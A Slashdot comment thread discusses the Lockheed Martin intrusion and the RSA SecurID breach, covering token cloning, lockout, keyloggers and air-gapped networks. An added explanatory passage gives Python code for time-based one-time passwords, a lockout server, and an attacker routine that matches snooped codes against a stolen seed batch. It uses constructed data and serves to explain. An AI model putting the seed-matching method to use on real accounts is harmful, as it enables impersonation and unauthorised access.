    7. Re:Does RSA store usernames and pins? by rahvin112 · · Score: 2

      Some of the early places that jumped on the SecurID tokens only used the SecurID as the password (in other words, there was no password in front of the 6-digit random code), thus it was trivial to compromise if you could compromise the RSA SecurID system. What I don't get is why these organizations didn't immediately upgrade security when word came down about the root compromise of RSA. Like one of the previous posters, I always believed that breaking the SecurID system was a deliberate and planned attack to gain access to secondary systems that used the tokens; it's only a question of who did it, because one party is responsible for both.

    8. Re:Does RSA store usernames and pins? by _Sprocket_ · · Score: 1

      Trying different PINs with the same token will cause a lockout, but will trying each token once with the same PIN? I'm pretty sure that would go unnoticed, especially if the attempts were made from different proxy servers to mask the source IP all being the same.

      A combination of PIN and Token Code act like a password. A bad auth attempt is a bad auth attempt no matter whether you used the wrong PIN or gave the wrong Token Code (although the SecurID system will log when it's noticed a correct token code and bad PIN or when the user might have transposed PIN and token code). So it doesn't much matter whether you're brute-forcing the token or the PIN - both will generate failed auth attempts and eventually bump up against any account lockout mechanism (which should be in place according to FISMA requirements).

    9. Re:Does RSA store usernames and pins? by ebonum · · Score: 1

      two words:
      keystroke logger

    10. Re:Does RSA store usernames and pins? by Anonymous Coward · · Score: 0

      Yes, every SecurID has a serial number on the back to match up with the seed file (to allocate it out of the box to the user).

      There may be other ways to get a current valid PIN from the real token at a specific point in time. Hey, if they can see it visually, that will do.

      Then I guess the copied token is just wound forwards/backwards in time index until that number is found.

      So then you are just left with the "something you know" aspect to manage, but I hear electrodes on the scrotum can assist in that concern. Or yes, just a plain old keyboard logger, but I would hope a facility that handles classified material doesn't have a regular keyboard that can be just unplugged without the alarms going off.

      So then you need to make the "something you have" part more secure, by not having a serial number or visual access to the PIN on display at all / any time. Hmm, I think that is called a smart card.

  7. Need some new words by Garble+Snarky · · Score: 1

    I think we need new English words to represent these concepts more concisely: an adjective for "not authorized to speak publicly on the matter", and a verb for "confirmed under condition of anonymity".

    1. Re:Need some new words by amolapacificapaloma · · Score: 1

      she = "not authorized to speak publicly on the matter"

      said = "confirmed under condition of anonymity".

      Like in... that's what she said!

      --
      exp(i*pi)+1=0
    2. Re:Need some new words by erroneus · · Score: 1

      Why? "Natspot'm" and "cucoa" are perfectly pronounceable acronyms!

  8. Quantum by SilverHatHacker · · Score: 0

    Wonder what relation, if any, this has to the quantum computer?

    --
    Funny may not give karma, but +5 Informative never made anyone snort coffee out their nose.
    1. Re:Quantum by betterunixthanunix · · Score: 1

      Probably none, since that computer only allows for a limited form of quantum computing (which, as far as I know, is not useful for factoring RSA numbers or solving the discrete logarithm problem or much that is likely to be of interest to the attackers). My guess is that the attackers were interested in Lockheed's software or weapons designs.

      --
      Palm trees and 8
    2. Re:Quantum by VortexCortex · · Score: 4, Funny

      Wonder what relation, if any, this has to the quantum computer?

      My guess is that their new quantum computer enables their security to exist as a superposition of itself -- both being very secure, and completely unsecured at the same time.

      However, now that the state of their security has been observed, it has collapsed into only one state (which is unfortunately: unsecured).

    3. Re:Quantum by semi-extrinsic · · Score: 1

      Well, given that Lockheed announced three days ago that they had "agreed to buy it", implying that they won't have it for several months (and it may not even physically exist yet), I'd say nada.

      --
      for i in `facebook friends "=bday" 2>/dev/null | cut -d " " -f 3-`; do facebook wallpost $i "Happy birthday!"; done
  9. Hey, maybe we can finally ask by 50000BTU_barbecue · · Score: 1

    ... Lockheed what the true top speed of the SR-71 was?

    --
    Mostly random stuff.
    1. Re:Hey, maybe we can finally ask by Announcer · · Score: 1

      Now that it's been hacked, it should be online soon, and you can Google it.

      --
      Willie...
    2. Re:Hey, maybe we can finally ask by Sentry23 · · Score: 0

      Funny story. Top speed of the SR-71B turns out to be exactly half the top speed of the TR-3B.

    3. Re:Hey, maybe we can finally ask by rrossman2 · · Score: 1

      Wow.. if you mean the Triumph then I guess the SR-71 was a lot slower than we had all guessed!

    4. Re:Hey, maybe we can finally ask by lennier1 · · Score: 1

      Depends on whether they served chili in the officers mess.

    5. Re:Hey, maybe we can finally ask by Briareos · · Score: 1

      African or European?

      np: Decimal - The Lesson Of Hope (Soma Coma 5)

      --

      "I'm not anti-anything, I'm anti-everything, it fits better." - Sole

  10. PC Magazine: Classified data secure. Wrong. by Relayman · · Score: 2

    According to PC Magazine: "Classified information is likely out of hackers' hands: Due to the volume of attacks that these kinds of systems on a daily basis, it's highly doubtful that Lockheed—or any security contractor—would keep top-secret information within reach, should one ever breach the remote access gates."

    Sounds like wishful thinking to me. Classified information has been breached in the past so why would you expect that it's magically safe now?

    --
    If I used a sig over again, would anyone notice?
    1. Re:PC Magazine: Classified data secure. Wrong. by Anonymous Coward · · Score: 0

      According to PC Magazine: "Classified information is likely out of hackers' hands: Due to the volume of attacks that these kinds of systems on a daily basis, it's highly doubtful that Lockheed—or any security contractor—would keep top-secret information within reach, should one ever breach the remote access gates."

      Sounds like wishful thinking to me. Classified information has been breached in the past so why would you expect that it's magically safe now?

      Sounds like ignorance on your part to me.

    2. Re:PC Magazine: Classified data secure. Wrong. by Anonymous Coward · · Score: 0

      I would imagine they keep a separate network, not connected to the internet, for stuff no one is supposed to get at. Otherwise stuff would be leaking everywhere and defense software would be developed much more cheaply.

    3. Re:PC Magazine: Classified data secure. Wrong. by tsotha · · Score: 1

      Classified information has been breached in the past so why would you expect that it's magically safe now?

      Oh? Classified information has been stolen by hacking in from the internet? When?

    4. Re:PC Magazine: Classified data secure. Wrong. by Anonymous Coward · · Score: 0

      According to PC Magazine: "Classified information is likely out of hackers' hands: Due to the volume of attacks that these kinds of systems on a daily basis, it's highly doubtful that Lockheed—or any security contractor—would keep top-secret information within reach, should one ever breach the remote access gates." Sounds like wishful thinking to me. Classified information has been breached in the past so why would you expect that it's magically safe now?

      I know someone who works for Lockheed Martin, and they have said that their RSA token allows them offsite access to at least some classified material.

    5. Re:PC Magazine: Classified data secure. Wrong. by Anonymous Coward · · Score: 0

      Classified networks are not connected to unclassified networks.
      When classified networks are breached, it is by an insider with physical access to classified machines, or by a physical intrusion.

    6. Re:PC Magazine: Classified data secure. Wrong. by Anonymous Coward · · Score: 0

      I work for a company that does top secret government work. Classified systems are not allowed to be on an internet-connected network. There is an air gap that must be breached by sneakernet. So while you might get all sorts of great intel and IP on the corporate LAN, you simply can't get to the systems where classified work is done. Someone would have to make a human error and put the information in the wrong place. That kind of thing does occasionally happen, but the screw-ups are fringe classified stuff (linking pieces of info that shouldn't be linked) and not the real good stuff like the plans to some device. When classified information is put in the wrong place, everything is wiped, backups confiscated, and everyone involved gets a lovely grilling.

    7. Re:PC Magazine: Classified data secure. Wrong. by Relayman · · Score: 1

      The requisite Wikipedia article states that the successful attack on Google by the Chinese indicates that they have stolen classified information from defense contractors. However, that is more like speculation than hard evidence.

      With Google search, most breaches are done by bypassing the Internet, either by using a USB flash drive or by stealing hard disks.

      I may have exaggerated, but after reading The Cuckoo's Egg, where attacks on the military network were run through security defense contractor Mitre Corporation, I remain skeptical that classified data is immune from Internet attack. How were the Chinese able to develop the J-20 stealth fighter without stealing U.S. classified data?

      --
      If I used a sig over again, would anyone notice?
    8. Re:PC Magazine: Classified data secure. Wrong. by tsotha · · Score: 2

      Oh, don't get me wrong. I think classified data is routinely stolen by other countries. I just don't think much (if any) is stolen by cyberspies hacking in from the outside. When I worked as a defense contractor the rules were pretty strict - we had a network with classified data on it, but that network was physically disconnected from the internet. The cables were even covered in thick pipes that were regularly inspected to discourage tapping from the inside.

      I'm not saying nobody has ever stolen classified data by hacking in. But for that to happen someone has to physically put classified data on an insecure network, something that's not easy to do by accident.

    9. Re:PC Magazine: Classified data secure. Wrong. by Anonymous Coward · · Score: 0

      According to PC Magazine: "Classified information is likely out of hackers' hands: Due to the volume of attacks that these kinds of systems on a daily basis, it's highly doubtful that Lockheed—or any security contractor—would keep top-secret information within reach, should one ever breach the remote access gates."

      Sounds like wishful thinking to me. Classified information has been breached in the past so why would you expect that it's magically safe now?

      Probably because a hacker would need to get through additional layers of security to access whatever system the classified information is on. If the information is really that sensitive, there is probably an auditing system in place to keep track of who accesses the data and when.

      Unless the hackers found someone who has completely ignored all of his or her anti-social-engineering training classes (or if they have someone on the inside), it is completely plausible that they didn't get much farther than the Lockheed intranet website.

    10. Re:PC Magazine: Classified data secure. Wrong. by smash · · Score: 1

      How were the Chinese able to develop the J-20 stealth fighter without stealing U.S. classified data?

      Perhaps by, you know, research. Stealth has been around since the 80s or earlier - Hitler had a rudimentary stealth flying wing design in WW2. China has a few billion people - if even 1% of them are gifted, that is a hell of a lot of scientific brain power.

      --
      I run: Windows, OS X, Linux, FreeBSD. Just because you have a hammer, doesn't mean everything is a nail.
  11. RSA putting publicity ahead of security? by Anonymous Coward · · Score: 0

    RSA has kept details of the SecurID attack secret. In particular, they won't even say what was taken.

    Of course, the attackers know exactly what was taken, because they are holding and exploiting the material.

    So the only people in the dark are the bystanders and-- perhaps most importantly-- potential customers.

    Sadly, RSA's secrecy around the incident looks to be a public relations move to conceal the severity of the attack.

  12. How does it generate the string of numbers? by Anonymous Coward · · Score: 0

    These security tokens have always fascinated me. I use Google two-step auth with my phone with the same type of technology. Does anyone know what variables might go in to producing the digits? I imagine possibly the time, MAC address of the phone, and/or some other identifiers.

    1. Re:How does it generate the string of numbers? by vajrabum · · Score: 1

      I'm not sure how the Google stuff works. The SecurID tag is simply a clock wired up to a random number generator. It has a seed that is secret that is shared with the Authentication server (ACE server). As long as the clocks are sync'd, the token/tag will show the same number as generated on the server. Each SecurID token has that seed and also a serial number. Based on some stuff I heard recently through the grapevine, I'd guess that somebody has figured out how to map from the SecurID serial number to the key seed. If the system is properly designed there isn't any such mapping, but fatal shortcomings in cryptographic software are nothing new. If you have SecurID in your enterprise then you probably want to grab your salesguy by the throat and tell him they need to fix this *now* at RSA's expense. This may well be the worst IT security breach of the 21st century so far.

  13. Slashdot Memo #2334212123 by Anonymous Coward · · Score: 0

    Dear Reuters:

    Expect a visit from some friendly people.

    Yours In Krasnoyarsk,
    Kilgore T.

  14. really? by sjudd · · Score: 1

    there are military or high security environments still using RSA?

    --
    All women want is honesty, if you can fake that, you're in.
  15. Oh noes! by DamienNightbane · · Score: 0

    Looks like Anonymous is planning on building an air force.

  16. We could do it the german way by acidfast7 · · Score: 1

    I think we need new English words to represent these concepts more concisely: an adjective for "not authorized to speak publicly on the matter", and a verb for "confirmed under condition of anonymity".

    verb: confirmedunderconditionofanonymiten adjective: unauthorizedtospeaktothepubliconmatterse

  17. We have perfectly good words for these already by petes_PoV · · Score: 1

    The first one is "unreliable" and the second is "rumoured". As in "an unreliable source is rumoured to have said .... "

    --
    politicians are like babies' nappies: they should both be changed regularly and for the same reasons
    1. Re:We have perfectly good words for these already by Haeleth · · Score: 1

      Oh, I was going to go with "a traitor leaked ..."

      Much shorter and to the point.

  18. Soft tokens? by Technomancer · · Score: 2

    If they are using soft token apps in addition to hardware keys, they are trivial to duplicate if you can get ahold of the key string and password from an employee.

  19. Comment removed by account_deleted · · Score: 3, Interesting

    Comment removed based on user account deletion

  20. RSA's lost data by Anonymous Coward · · Score: 0

    If you have it and observe 2 or maybe 3 or 4 authentications of a given token, I suspect you can impersonate that token at will.

    You will still need the PIN and username and possibly password, but you get those when you snoop the authentications.

    And lastly, you'll need a giant bucket of CPU to calculate all the tokens for each point in time you see an RSA key's authentication.
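
    The token mechanics argued over in this thread - comment #12.1 (a clock plus a seed shared with the authentication server), comment #6.8 (a wrong PIN and a wrong token code are the same failure and both count toward lockout, so trying each cloned token once does not dodge it) and comment #20 above (matching a few snooped logins against a stolen batch of seeds) - as an added worked example that is not part of the original thread and is not RSA's code. It uses the public RFC 4226/6238 HMAC-SHA1 one-time-password construction (the same family Google's two-step codes use) as a stand-in for the proprietary SecurID algorithm; the 60-second step, the server class, the lockout threshold, and every serial number, seed, username, PIN and timestamp are constructed for illustration.

```python
"""Time-synchronous OTP: token code generation, server check with lockout,
and seed matching from snooped logins.  Added example, not RSA's code:
RFC 4226/6238 HMAC-SHA1 stands in for the proprietary SecurID algorithm.
All serials, seeds, users, PINs and timestamps below are constructed."""
import hashlib
import hmac
import struct

DIGITS = 6
STEP = 60          # SecurID tokens roll every 60 s; RFC 6238 test vectors use 30
WINDOW = 1         # accept +-1 step of clock drift, as real servers do
MAX_FAILURES = 3   # per-account lockout threshold (constructed policy value)


def hotp(seed: bytes, counter: int, digits: int = DIGITS) -> str:
    """RFC 4226: HMAC-SHA1 over the big-endian 8-byte counter, then dynamic
    truncation to a decimal code of the requested length."""
    mac = hmac.new(seed, struct.pack(">Q", counter), hashlib.sha1).digest()
    off = mac[-1] & 0x0F
    dbc = ((mac[off] & 0x7F) << 24 | mac[off + 1] << 16
           | mac[off + 2] << 8 | mac[off + 3])
    return f"{dbc % 10 ** digits:0{digits}d}"


def totp(seed: bytes, unix_time: int, step: int = STEP, digits: int = DIGITS) -> str:
    """RFC 6238: the counter is the number of whole steps since the epoch, so a
    token and a server with the same seed and synced clocks show the same code."""
    return hotp(seed, unix_time // step, digits)


def code_matches(seed: bytes, unix_time: int, code: str) -> bool:
    """True if `code` is what this seed shows at unix_time, within +-WINDOW steps.
    Every offset is evaluated so a match does not short-circuit the comparison."""
    counter = unix_time // STEP
    hits = [hmac.compare_digest(hotp(seed, counter + d), code)
            for d in range(-WINDOW, WINDOW + 1)]
    return any(hits)


class TokenAuthServer:
    """Hypothetical stand-in for the authentication server: holds the same
    seed as the token plus a hash of the user's PIN and a failure counter."""

    def __init__(self):
        self.accounts = {}   # username -> {"seed", "pin_hash", "failures"}

    def enroll(self, username: str, seed: bytes, pin: str) -> None:
        self.accounts[username] = {"seed": seed, "failures": 0,
                                   "pin_hash": hashlib.sha256(pin.encode()).digest()}

    def verify(self, username: str, passcode: str, now: int) -> str:
        """passcode = PIN followed by the displayed digits.  A wrong PIN and a
        wrong token code are indistinguishable to the caller and both count
        toward lockout.  Returns 'ok', 'fail', 'locked' or 'unknown'."""
        acct = self.accounts.get(username)
        if acct is None:
            return "unknown"
        if acct["failures"] >= MAX_FAILURES:
            return "locked"
        pin, code = passcode[:-DIGITS], passcode[-DIGITS:]
        pin_ok = hmac.compare_digest(hashlib.sha256(pin.encode()).digest(),
                                     acct["pin_hash"])
        if pin_ok and code_matches(acct["seed"], now, code):
            acct["failures"] = 0
            return "ok"
        acct["failures"] += 1
        return "fail"


def match_seeds(batch: dict, observations: list) -> list:
    """Attacker side: from a stolen {serial: seed} batch and snooped
    (unix_time, token_code) pairs for one user, list every serial whose seed
    reproduces all observed codes within the drift window."""
    return [serial for serial, seed in batch.items()
            if all(code_matches(seed, t, c) for t, c in observations)]


def expected_false_matches(batch_size: int, n_obs: int) -> float:
    """Wrong serials expected to survive n_obs observations: each observation
    keeps a fraction (2*WINDOW+1)/10**DIGITS of the batch by chance."""
    return batch_size * ((2 * WINDOW + 1) / 10 ** DIGITS) ** n_obs


def demo() -> dict:
    """Constructed scenario: a 2000-token seed batch leaks; one user is snooped."""
    batch = {f"SN{n:06d}": hashlib.sha1(f"constructed-seed-{n}".encode()).digest()
             for n in range(2000)}
    victim, pin, t0 = "SN001234", "4821", 1_306_800_000   # constructed values
    server = TokenAuthServer()
    server.enroll("jdoe", batch[victim], pin)
    out = {"login": server.verify("jdoe", pin + totp(batch[victim], t0), t0)}
    # Two snooped logins, 10 and 20 minutes later, single out the serial.
    obs = [(t, totp(batch[victim], t)) for t in (t0 + 600, t0 + 1200)]
    out["candidates"] = match_seeds(batch, obs)
    out["false_matches_1obs"] = expected_false_matches(len(batch), 1)
    # Knowing the PIN but not the serial, try the first five clones once each:
    # the third failure locks the account regardless of which token was used.
    spray = TokenAuthServer()
    spray.enroll("jdoe", batch[victim], pin)
    out["spray"] = [spray.verify("jdoe", pin + totp(s, t0), t0)
                    for s in list(batch.values())[:5]]
    return out


if __name__ == "__main__":
    print(demo())
```

    The `match_seeds` step is the cheap version of the "giant bucket of CPU" above: one HMAC per seed per observation per drift offset, so a batch of tens of thousands of seeds and two observations is seconds of work, not a search problem. What the attacker cannot get from the seed batch alone is the PIN, which is why the helpdesk-reset, keylogger and shoulder-surfing routes discussed earlier in the thread matter.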

  21. Lockheed Martin and the UK Census by Uhyve · · Score: 1

    Aren't they the guys who did the UK census? I wonder if they'll offer every UK citizen Identity Protection. Even though I'm from the UK and hence was forced to participate in the census, I'd almost feel good about that information getting stolen, this is what us whiny people were going on about.

  22. Tempest, top secret vs secret etc by Anonymous Coward · · Score: 0

    I have to agree. Back when I was working at a large computer company doing DoD work, all the stuff classified Secret that was on-line was in a non-networked room. You had to sign in and out. You could not bring any disks/tape/usb drives and the like in there. You had to show your IDs etc. Every Secret item was signed in and out, logged and work-product burned. They were perfectly willing to look at everything you took in or out. The room itself was designed in accordance with tempest procedures to avoid any emissions - so there was definitely no external access. IIRC even the floor was elevated as compared to the other parts of the building, presumably to make sure there was nothing coming in through the floor when needed. And it was all internal walls. I have a hard time believing that any DoD Contractors would be going *backwards* in those respects.

    And that was just the *Secret* stuff. The Top Secret was even worse in terms of paper handling, controls, logging, safe access, and paper trails than the merely Secret paper and that continued through the TS vs S world into the computer side. The "burn bag" alone wasn't enough. The security people on both were really on top of making sure that procedures were followed.

    Admittedly it has been over 10 years, but I can't believe it would have gone backwards in terms of security. Some things are so basic that it seems unbelievable they'd be changed - but hey, we see it all the time, so who knows.

  23. Re:Hey, maybe we can finally ask .... TR3B by Anonymous Coward · · Score: 0

    I didn't know that a 1962 Triumph was faster than the SR-71B

  24. So you're against whistleblowers? by apparently · · Score: 1

    What exactly is your problem with people revealing information that organizations would rather keep hidden?

    Yes, I'm not a moron

    And what exactly is your evidence that you're not a moron?

    1. Re:So you're against whistleblowers? by dbraden · · Score: 1

      What exactly is your problem with people revealing information that organizations would rather keep hidden?

      Not all information should be "free", nor do you have a right to know everything. An organization, or an individual, wanting to keep something secret is not, in and of itself, evil.

    2. Re:So you're against whistleblowers? by apparently · · Score: 1

      Not all information should be "free", nor do you have a right to know everything. An organization, or an individual, wanting to keep something secret is not, in and of itself, evil.

      When did I say that all information should be free? Care to quote me?
      When did I say that I have a right to know everything? Care to quote me?
      When did I say that an organization or an individual wanting to keep something secret is in and of itself evil? Care to quote me?

      That's quite a lot of inferring you did there, and none of it's remotely accurate. Excellent job, champ.

      But please tell me how it's beneficial for people not to know that Lockheed was broken into through an RSA vulnerability? Please tell me how it's beneficial to current users of RSA's product to know the extent to which they are at risk. I encourage you to answer both questions directly in lieu of making half-assed inferences.

  25. not to mention by dlt074 · · Score: 1

    Nothing classified will even be on the compromised networks. Classified (US government) material is not placed on networks connected to networks connected to the internet... if so, they have worse problems than bad PR and compromised boxes. You do not want the US government up your ass for spilling classified data.

  26. Should have by zero0ne · · Score: 1

    thought about getting Enterprise protection.

  27. Surprise Intrusion? by BoRegardless · · Score: 1

    How come I no longer respect big government and corporations to adequately protect themselves and us as a country anymore? It couldn't be because a major security blunder is reported in the press about once a week, is it?

    How can any large public corporation & defense contractors not have teams of people to constantly audit & oversee security procedures, penetration testing, network analysis, and systems analysis to keep up to date on a daily threat basis?

    These constant adverse events inspire dark cynicism in an otherwise positive person.

    Logical answers? If you can't keep the bad guys out, for god's sake get them offline permanently.

    1. Re:Surprise Intrusion? by sloth+jr · · Score: 2

      A few aspects of security as practiced in the military-industrial complex that you may be unaware of:
      - daily automated audits; these regularly flag new vulnerabilities;
      - entire teams dedicated to evaluation of controls and failure therein
      - segmentation of computing resources by sensitivity; if it's really sensitive, it's not on any network you can get to.
      - physical barriers (gates, armed guards, man traps)

      There are literally thousands of pages of controls concerning security just for non-classified resources: http://iase.disa.mil/stigs/
      They all depend on the integrity of the persons entrusted to safeguard this data. Intentional violation of those controls as allegedly practiced by PFC Bradley Manning show how these safeguards can break down. Ultimately, you need humans to be able to keep a secret if you have the notion of "classified". That's the real security mechanism right there. That's why security clearances are designed to identify whether or not an individual is "loyal" and not likely to be coerced into revealing state secrets. In any human endeavor, though - some human will conspire to fuck it up. The end-result is almost always massive and persistent headache for everyone else.

  28. Why is it connected to web? by Anonymous Coward · · Score: 0

    Martin shouldn't connect to the intr0nets.
    TSAgent provocateur thug accessing an NSA fios splitter steal keys
    fuck the fourth amendment

  29. govt sickness by Anonymous Coward · · Score: 0

    Healing begins by admitting the sickness

  30. Dilbert by snookiex · · Score: 1

    A very convenient comic strip

    --
    Open Source Network Inventory for the masses! Kuwaiba
  31. expect china by johncandale · · Score: 1

    Expect China to develop yet another military technology stolen from the US in the next 24 months, mark my words